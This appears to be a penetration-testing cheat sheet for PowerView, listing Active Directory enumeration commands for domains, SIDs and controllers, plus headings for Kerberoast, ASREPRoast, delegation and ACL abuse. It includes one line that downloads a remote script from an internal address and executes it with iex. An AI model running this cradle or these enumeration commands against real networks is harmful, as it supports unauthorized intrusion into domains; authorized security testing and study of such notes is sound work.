PowerView

Extra: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview

Import-Module

Import-Module PowerView.ps1
. .\PowerView.ps1
iex(new-object net.webclient).DownloadString('http://10.10.10.10/PowerView.ps1')

Get-Domain

Get-Domain
Get-Domain -Domain vulnableone.local

Get-DomainSID

Get-DomainSID
Get-DomainSID -Domain vulnableone.local

Get-DomainController

Get-DomainController | select Forest, Name, OSVersion | fl
Get-DomainController -Domain vulnableone.local

Get-DomainPolicyData

Get-DomainUser

Get-DomainComputer

Get-DomainOU

Get-DomainGroup

Get-DomainGPO

Get-DomainGPOLocalGroup

Get-DomainGPOUserLocalGroupMapping

This is useful for finding where domain groups have local admin access.

Get-DomainObjectACL

GenericAll

Users

Group

GenericWrite

User

Computer

Get-DomainTrust

Get-ForestDomain

Kerberoast

ASREPRoast

Unconstrained Delegation

Constrained Delegation

Find-DomainShare

Find-LocalAdminAccess

Last updated